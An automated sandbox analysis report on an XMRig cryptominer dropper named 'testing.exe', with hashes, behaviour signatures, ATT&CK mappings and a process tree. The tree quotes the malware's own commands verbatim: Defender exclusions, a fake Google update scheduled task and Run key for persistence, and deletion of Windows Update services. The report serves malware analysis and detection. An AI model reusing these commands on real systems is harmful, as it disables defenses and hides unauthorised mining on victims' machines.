Resubmissions

05-04-2023 16:34

230405-t3e6saaa8v 10

31-03-2023 15:09

230331-sjvxfscc5v 10

31-03-2023 13:39

230331-qx416sba8z 10

30-03-2023 21:18

230330-z5tpvafg2x 10

30-03-2023 21:03

230330-zv6awsff8s 10

30-03-2023 18:59

230330-xncnwsfd2y 10

30-03-2023 17:02

230330-vj468sde36 10

30-03-2023 13:33

230330-qtnvsach28 10

30-03-2023 06:37

230330-hdjl5abc45 10

29-03-2023 21:31

230329-1c2enaaa35 10

Analysis

  • max time kernel
    1682s
  • max time network
    1798s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    30-03-2023 06:37

General

  • Target

    testing.exe

  • Size

    2.1MB

  • MD5

    a12bc9557ad889a49e7b4f970c78dda8

  • SHA1

    5383b8e6d09d41384281b95f9ccc8e050e7c04fa

  • SHA256

    9940b1f8deb931e431dded69a71e6c9ac4c9e7d4fa560932f92cf0ae94cc65e0

  • SHA512

    be8ca69b115aea7382ad4a780a0452a0df986bb036aec0aea3cac9f4b0d598c4256f0732720a5ee83fc05cd7dac7adf545792f91f2b60a05027a1811f12000ee

  • SSDEEP

    24576:MHOygNfXDgkB9Y+AVIGckFdi3MUxbw+0AX4xVILyqe7keglf9BHHpRNt05sJNuI6:MuhBSda2+0+4xKLyqewBnfNwsJNO

Score
10/10

Malware Config

Signatures

  • Modifies security service 2 TTPs 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 13 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 33 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Stops running service(s) 3 TTPs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • UPX packed file 31 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in System32 directory 5 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 42 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1252
      • C:\Users\Admin\AppData\Local\Temp\testing.exe
        "C:\Users\Admin\AppData\Local\Temp\testing.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in Drivers directory
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        PID:912
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1528
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#thaqo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:960
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
          3⤵
          • Creates scheduled task(s)
          PID:1972
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:520
        • C:\Windows\System32\powercfg.exe
          powercfg /x -hibernate-timeout-ac 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1844
        • C:\Windows\System32\powercfg.exe
          powercfg /x -hibernate-timeout-dc 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1396
        • C:\Windows\System32\powercfg.exe
          powercfg /x -standby-timeout-ac 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:940
        • C:\Windows\System32\powercfg.exe
          powercfg /x -standby-timeout-dc 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:916
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1160
        • C:\Windows\System32\sc.exe
          sc stop UsoSvc
          3⤵
          • Launches sc.exe
          PID:864
        • C:\Windows\System32\sc.exe
          sc stop WaaSMedicSvc
          3⤵
          • Launches sc.exe
          PID:1640
        • C:\Windows\System32\sc.exe
          sc stop wuauserv
          3⤵
          • Launches sc.exe
          PID:1512
        • C:\Windows\System32\sc.exe
          sc stop bits
          3⤵
          • Launches sc.exe
          PID:304
        • C:\Windows\System32\sc.exe
          sc stop dosvc
          3⤵
          • Launches sc.exe
          PID:316
        • C:\Windows\System32\reg.exe
          reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
          3⤵
            PID:1696
          • C:\Windows\System32\reg.exe
            reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
            3⤵
              PID:1928
            • C:\Windows\System32\reg.exe
              reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
              3⤵
              • Modifies security service
              PID:1140
            • C:\Windows\System32\reg.exe
              reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
              3⤵
                PID:540
              • C:\Windows\System32\reg.exe
                reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                3⤵
                  PID:1880
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#mibqiuc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
                2⤵
                • Drops file in System32 directory
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:812
                • C:\Windows\system32\schtasks.exe
                  "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
                  3⤵
                    PID:1812
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                  2⤵
                  • Drops file in System32 directory
                  • Modifies data under HKEY_USERS
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1212
                • C:\Windows\System32\cmd.exe
                  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                  2⤵
                    PID:468
                    • C:\Windows\System32\sc.exe
                      sc stop UsoSvc
                      3⤵
                      • Launches sc.exe
                      PID:1396
                    • C:\Windows\System32\sc.exe
                      sc stop WaaSMedicSvc
                      3⤵
                      • Launches sc.exe
                      PID:1140
                    • C:\Windows\System32\sc.exe
                      sc stop wuauserv
                      3⤵
                      • Launches sc.exe
                      PID:1996
                    • C:\Windows\System32\sc.exe
                      sc stop bits
                      3⤵
                      • Launches sc.exe
                      PID:840
                    • C:\Windows\System32\sc.exe
                      sc stop dosvc
                      3⤵
                      • Launches sc.exe
                      PID:1012
                    • C:\Windows\System32\reg.exe
                      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                      3⤵
                        PID:520
                      • C:\Windows\System32\reg.exe
                        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                        3⤵
                          PID:960
                        • C:\Windows\System32\reg.exe
                          reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                          3⤵
                            PID:1728
                          • C:\Windows\System32\reg.exe
                            reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                            3⤵
                              PID:1196
                            • C:\Windows\System32\reg.exe
                              reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                              3⤵
                                PID:1540
                            • C:\Windows\System32\cmd.exe
                              C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                              2⤵
                              • Suspicious use of WriteProcessMemory
                              PID:676
                              • C:\Windows\System32\powercfg.exe
                                powercfg /x -hibernate-timeout-ac 0
                                3⤵
                                • Suspicious use of AdjustPrivilegeToken
                                PID:872
                              • C:\Windows\System32\powercfg.exe
                                powercfg /x -hibernate-timeout-dc 0
                                3⤵
                                • Suspicious use of AdjustPrivilegeToken
                                PID:864
                              • C:\Windows\System32\powercfg.exe
                                powercfg /x -standby-timeout-ac 0
                                3⤵
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1104
                              • C:\Windows\System32\powercfg.exe
                                powercfg /x -standby-timeout-dc 0
                                3⤵
                                • Suspicious use of AdjustPrivilegeToken
                                PID:976
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#thaqo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
                              2⤵
                              • Drops file in System32 directory
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of WriteProcessMemory
                              PID:908
                              • C:\Windows\system32\schtasks.exe
                                "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
                                3⤵
                                • Creates scheduled task(s)
                                PID:1360
                            • C:\Windows\System32\conhost.exe
                              C:\Windows\System32\conhost.exe piwxkhozdwrizr
                              2⤵
                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                              • Suspicious behavior: EnumeratesProcesses
                              PID:324
                            • C:\Windows\System32\cmd.exe
                              C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
                              2⤵
                              • Drops file in Program Files directory
                              PID:1892
                              • C:\Windows\System32\Wbem\WMIC.exe
                                wmic PATH Win32_VideoController GET Name, VideoProcessor
                                3⤵
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1776
                            • C:\Windows\System32\cmd.exe
                              C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
                              2⤵
                              • Drops file in Program Files directory
                              PID:900
                            • C:\Windows\System32\conhost.exe
                              C:\Windows\System32\conhost.exe ajhvfdbttvpjvzel 6E3sjfZq2rJQaxvLPmXgsA4f0StS9pic9Xw++oZ1mnbMNdSoXP4ts/KtNDhUPQkUDVw9rZbme/VWRaCGMVy5A4KWmOYusR4Ik0iMHdgwpNOcjbYY5GHdN0CGOwXnubuj1k8SXyOPHLg/wcO08HTPQBCprXvYsSFocqjzqXvCOk3makNm0IivIoZ1KZt2YxT6Ci+BE7B/M5vRdKOrAlIyiTLPowHv2xwlgKELrnhNzBo4cDejdbTidr1qPNdTi4IwjcYnuD1ZGEEk854175l0vqhgS0J4NKy9OfqC4ZDiL7DMzbXsHZBHh2Jw55sStIs/MAZNnhxYjBZpkoZpwPghg6VnLEX8RYirlFk+ArUNG/2+FGzSRQ3kSkHyDV437Fza
                              2⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1992
                            • C:\Program Files\7-Zip\7zFM.exe
                              "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Desktop\WatchRevoke.iso"
                              2⤵
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of FindShellTrayWindow
                              PID:1828
                            • C:\Windows\system32\taskmgr.exe
                              "C:\Windows\system32\taskmgr.exe" /4
                              2⤵
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious behavior: GetForegroundWindowSpam
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of FindShellTrayWindow
                              • Suspicious use of SendNotifyMessage
                              PID:1104
                          • C:\Windows\system32\taskeng.exe
                            taskeng.exe {57E82506-49FA-411B-BED1-7D761428A450} S-1-5-18:NT AUTHORITY\System:Service:
                            1⤵
                            • Loads dropped DLL
                            • Suspicious use of WriteProcessMemory
                            PID:1096
                            • C:\Program Files\Google\Chrome\updater.exe
                              "C:\Program Files\Google\Chrome\updater.exe"
                              2⤵
                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                              • Drops file in Drivers directory
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              • Drops file in Program Files directory
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1668

                          Network

                          MITRE ATT&CK Matrix ATT&CK v6

                          Execution

                          Scheduled Task

                          1
                          T1053

                          Persistence

                          Modify Existing Service

                          2
                          T1031

                          Scheduled Task

                          1
                          T1053

                          Privilege Escalation

                          Scheduled Task

                          1
                          T1053

                          Defense Evasion

                          Modify Registry

                          1
                          T1112

                          Impair Defenses

                          1
                          T1562

                          Discovery

                          Query Registry

                          1
                          T1012

                          Impact

                          Service Stop

                          1
                          T1489

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads

                          • C:\Program Files\Google\Chrome\updater.exe
                            Filesize

                            2.1MB

                            MD5

                            a12bc9557ad889a49e7b4f970c78dda8

                            SHA1

                            5383b8e6d09d41384281b95f9ccc8e050e7c04fa

                            SHA256

                            9940b1f8deb931e431dded69a71e6c9ac4c9e7d4fa560932f92cf0ae94cc65e0

                            SHA512

                            be8ca69b115aea7382ad4a780a0452a0df986bb036aec0aea3cac9f4b0d598c4256f0732720a5ee83fc05cd7dac7adf545792f91f2b60a05027a1811f12000ee

                          • C:\Program Files\Google\Chrome\updater.exe
                            Filesize

                            2.1MB

                            MD5

                            a12bc9557ad889a49e7b4f970c78dda8

                            SHA1

                            5383b8e6d09d41384281b95f9ccc8e050e7c04fa

                            SHA256

                            9940b1f8deb931e431dded69a71e6c9ac4c9e7d4fa560932f92cf0ae94cc65e0

                            SHA512

                            be8ca69b115aea7382ad4a780a0452a0df986bb036aec0aea3cac9f4b0d598c4256f0732720a5ee83fc05cd7dac7adf545792f91f2b60a05027a1811f12000ee

                          • C:\Program Files\Google\Libs\g.log
                            Filesize

                            198B

                            MD5

                            37dd19b2be4fa7635ad6a2f3238c4af1

                            SHA1

                            e5b2c034636b434faee84e82e3bce3a3d3561943

                            SHA256

                            8066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07

                            SHA512

                            86e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5

                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                            Filesize

                            7KB

                            MD5

                            ac18b59b4c9ac3faa2fc66c855326d56

                            SHA1

                            1821b4a4744b2321f35e62292b227e7d8cf88f62

                            SHA256

                            59145537e4db61595798d8526451d3b4e5ccbd6bd225735b5276e17f5d5ae7a6

                            SHA512

                            d7f1d476229e9776fc64149f160933d3b38887a36a98d950c478a4c8f000a1381af44bad932ea8a854e63063f749d657c91c0772036b5dbf10cd40dd5ea50b67

                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                            Filesize

                            7KB

                            MD5

                            ac18b59b4c9ac3faa2fc66c855326d56

                            SHA1

                            1821b4a4744b2321f35e62292b227e7d8cf88f62

                            SHA256

                            59145537e4db61595798d8526451d3b4e5ccbd6bd225735b5276e17f5d5ae7a6

                            SHA512

                            d7f1d476229e9776fc64149f160933d3b38887a36a98d950c478a4c8f000a1381af44bad932ea8a854e63063f749d657c91c0772036b5dbf10cd40dd5ea50b67

                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\G7SFOCYLLPHTXY6PUHVN.temp
                            Filesize

                            7KB

                            MD5

                            ac18b59b4c9ac3faa2fc66c855326d56

                            SHA1

                            1821b4a4744b2321f35e62292b227e7d8cf88f62

                            SHA256

                            59145537e4db61595798d8526451d3b4e5ccbd6bd225735b5276e17f5d5ae7a6

                            SHA512

                            d7f1d476229e9776fc64149f160933d3b38887a36a98d950c478a4c8f000a1381af44bad932ea8a854e63063f749d657c91c0772036b5dbf10cd40dd5ea50b67

                          • C:\Windows\System32\drivers\etc\hosts
                            Filesize

                            2KB

                            MD5

                            3e9af076957c5b2f9c9ce5ec994bea05

                            SHA1

                            a8c7326f6bceffaeed1c2bb8d7165e56497965fe

                            SHA256

                            e332ebfed27e0bb08b84dfda05acc7f0fa1b6281678e0120c5b7c893a75df47e

                            SHA512

                            933ba0d69e7b78537348c0dc1bf83fb069f98bb93d31c638dc79c4a48d12d879c474bd61e3cbde44622baef5e20fb92ebf16c66128672e4a6d4ee20afbf9d01f

                          • \??\PIPE\srvsvc
                            MD5

                            d41d8cd98f00b204e9800998ecf8427e

                            SHA1

                            da39a3ee5e6b4b0d3255bfef95601890afd80709

                            SHA256

                            e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                            SHA512

                            cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                          • \??\PIPE\srvsvc
                            MD5

                            d41d8cd98f00b204e9800998ecf8427e

                            SHA1

                            da39a3ee5e6b4b0d3255bfef95601890afd80709

                            SHA256

                            e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                            SHA512

                            cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                          • \Program Files\Google\Chrome\updater.exe
                            Filesize

                            2.1MB

                            MD5

                            a12bc9557ad889a49e7b4f970c78dda8

                            SHA1

                            5383b8e6d09d41384281b95f9ccc8e050e7c04fa

                            SHA256

                            9940b1f8deb931e431dded69a71e6c9ac4c9e7d4fa560932f92cf0ae94cc65e0

                            SHA512

                            be8ca69b115aea7382ad4a780a0452a0df986bb036aec0aea3cac9f4b0d598c4256f0732720a5ee83fc05cd7dac7adf545792f91f2b60a05027a1811f12000ee

                          • memory/324-113-0x0000000140000000-0x0000000140016000-memory.dmp
                            Filesize

                            88KB

                          • memory/324-106-0x0000000140000000-0x0000000140016000-memory.dmp
                            Filesize

                            88KB

                          • memory/812-82-0x00000000026B0000-0x0000000002730000-memory.dmp
                            Filesize

                            512KB

                          • memory/812-83-0x00000000026B0000-0x0000000002730000-memory.dmp
                            Filesize

                            512KB

                          • memory/812-84-0x00000000026BB000-0x00000000026F2000-memory.dmp
                            Filesize

                            220KB

                          • memory/908-94-0x00000000012AB000-0x00000000012E2000-memory.dmp
                            Filesize

                            220KB

                          • memory/908-93-0x00000000012A4000-0x00000000012A7000-memory.dmp
                            Filesize

                            12KB

                          • memory/912-75-0x000000013F700000-0x000000013F916000-memory.dmp
                            Filesize

                            2.1MB

                          • memory/912-54-0x000000013F700000-0x000000013F916000-memory.dmp
                            Filesize

                            2.1MB

                          • memory/960-70-0x0000000002350000-0x0000000002358000-memory.dmp
                            Filesize

                            32KB

                          • memory/960-69-0x000000001AF60000-0x000000001B242000-memory.dmp
                            Filesize

                            2.9MB

                          • memory/960-73-0x0000000002390000-0x0000000002410000-memory.dmp
                            Filesize

                            512KB

                          • memory/960-71-0x0000000002390000-0x0000000002410000-memory.dmp
                            Filesize

                            512KB

                          • memory/960-72-0x0000000002390000-0x0000000002410000-memory.dmp
                            Filesize

                            512KB

                          • memory/1104-142-0x0000000140000000-0x00000001405E8000-memory.dmp
                            Filesize

                            5.9MB

                          • memory/1104-137-0x0000000140000000-0x00000001405E8000-memory.dmp
                            Filesize

                            5.9MB

                          • memory/1104-138-0x0000000140000000-0x00000001405E8000-memory.dmp
                            Filesize

                            5.9MB

                          • memory/1104-143-0x0000000140000000-0x00000001405E8000-memory.dmp
                            Filesize

                            5.9MB

                          • memory/1212-90-0x000000000105B000-0x0000000001092000-memory.dmp
                            Filesize

                            220KB

                          • memory/1212-89-0x0000000001054000-0x0000000001057000-memory.dmp
                            Filesize

                            12KB

                          • memory/1528-60-0x0000000001DB0000-0x0000000001DB8000-memory.dmp
                            Filesize

                            32KB

                          • memory/1528-61-0x00000000023A4000-0x00000000023A7000-memory.dmp
                            Filesize

                            12KB

                          • memory/1528-62-0x00000000023AB000-0x00000000023E2000-memory.dmp
                            Filesize

                            220KB

                          • memory/1528-59-0x000000001B140000-0x000000001B422000-memory.dmp
                            Filesize

                            2.9MB

                          • memory/1668-101-0x000000013FC10000-0x000000013FE26000-memory.dmp
                            Filesize

                            2.1MB

                          • memory/1668-88-0x000000013FC10000-0x000000013FE26000-memory.dmp
                            Filesize

                            2.1MB

                          • memory/1992-110-0x0000000000B50000-0x0000000000B70000-memory.dmp
                            Filesize

                            128KB

                          • memory/1992-111-0x0000000000AE0000-0x0000000000B00000-memory.dmp
                            Filesize

                            128KB

                          • memory/1992-112-0x0000000140000000-0x00000001407F4000-memory.dmp
                            Filesize

                            8.0MB

                          • memory/1992-108-0x0000000140000000-0x00000001407F4000-memory.dmp
                            Filesize

                            8.0MB

                          • memory/1992-114-0x0000000140000000-0x00000001407F4000-memory.dmp
                            Filesize

                            8.0MB

                          • memory/1992-116-0x0000000140000000-0x00000001407F4000-memory.dmp
                            Filesize

                            8.0MB

                          • memory/1992-118-0x0000000140000000-0x00000001407F4000-memory.dmp
                            Filesize

                            8.0MB

                          • memory/1992-120-0x0000000140000000-0x00000001407F4000-memory.dmp
                            Filesize

                            8.0MB

                          • memory/1992-122-0x0000000140000000-0x00000001407F4000-memory.dmp
                            Filesize

                            8.0MB

                          • memory/1992-124-0x0000000140000000-0x00000001407F4000-memory.dmp
                            Filesize

                            8.0MB

                          • memory/1992-126-0x0000000140000000-0x00000001407F4000-memory.dmp
                            Filesize

                            8.0MB

                          • memory/1992-107-0x0000000140000000-0x00000001407F4000-memory.dmp
                            Filesize

                            8.0MB

                          • memory/1992-129-0x0000000140000000-0x00000001407F4000-memory.dmp
                            Filesize

                            8.0MB

                          • memory/1992-131-0x0000000140000000-0x00000001407F4000-memory.dmp
                            Filesize

                            8.0MB

                          • memory/1992-133-0x0000000140000000-0x00000001407F4000-memory.dmp
                            Filesize

                            8.0MB

                          • memory/1992-135-0x0000000140000000-0x00000001407F4000-memory.dmp
                            Filesize

                            8.0MB

                          • memory/1992-105-0x0000000000AE0000-0x0000000000B00000-memory.dmp
                            Filesize

                            128KB

                          • memory/1992-104-0x0000000000B50000-0x0000000000B70000-memory.dmp
                            Filesize

                            128KB

                          • memory/1992-139-0x0000000140000000-0x00000001407F4000-memory.dmp
                            Filesize

                            8.0MB

                          • memory/1992-141-0x0000000140000000-0x00000001407F4000-memory.dmp
                            Filesize

                            8.0MB

                          • memory/1992-103-0x0000000140000000-0x00000001407F4000-memory.dmp
                            Filesize

                            8.0MB

                          • memory/1992-102-0x0000000000040000-0x0000000000060000-memory.dmp
                            Filesize

                            128KB

                          • memory/1992-145-0x0000000140000000-0x00000001407F4000-memory.dmp
                            Filesize

                            8.0MB

                          • memory/1992-147-0x0000000140000000-0x00000001407F4000-memory.dmp
                            Filesize

                            8.0MB

                          • memory/1992-149-0x0000000140000000-0x00000001407F4000-memory.dmp
                            Filesize

                            8.0MB

                          • memory/1992-151-0x0000000140000000-0x00000001407F4000-memory.dmp
                            Filesize

                            8.0MB

                          • memory/1992-153-0x0000000140000000-0x00000001407F4000-memory.dmp
                            Filesize

                            8.0MB

                          • memory/1992-155-0x0000000140000000-0x00000001407F4000-memory.dmp
                            Filesize

                            8.0MB

                          • memory/1992-157-0x0000000140000000-0x00000001407F4000-memory.dmp
                            Filesize

                            8.0MB

                          • memory/1992-159-0x0000000140000000-0x00000001407F4000-memory.dmp
                            Filesize

                            8.0MB

                          • memory/1992-161-0x0000000140000000-0x00000001407F4000-memory.dmp
                            Filesize

                            8.0MB

                          • memory/1992-163-0x0000000140000000-0x00000001407F4000-memory.dmp
                            Filesize

                            8.0MB

                          • memory/1992-165-0x0000000140000000-0x00000001407F4000-memory.dmp
                            Filesize

                            8.0MB

                          • memory/1992-167-0x0000000140000000-0x00000001407F4000-memory.dmp
                            Filesize

                            8.0MB

                          • memory/1992-169-0x0000000140000000-0x00000001407F4000-memory.dmp
                            Filesize

                            8.0MB

                          • memory/1992-171-0x0000000140000000-0x00000001407F4000-memory.dmp
                            Filesize

                            8.0MB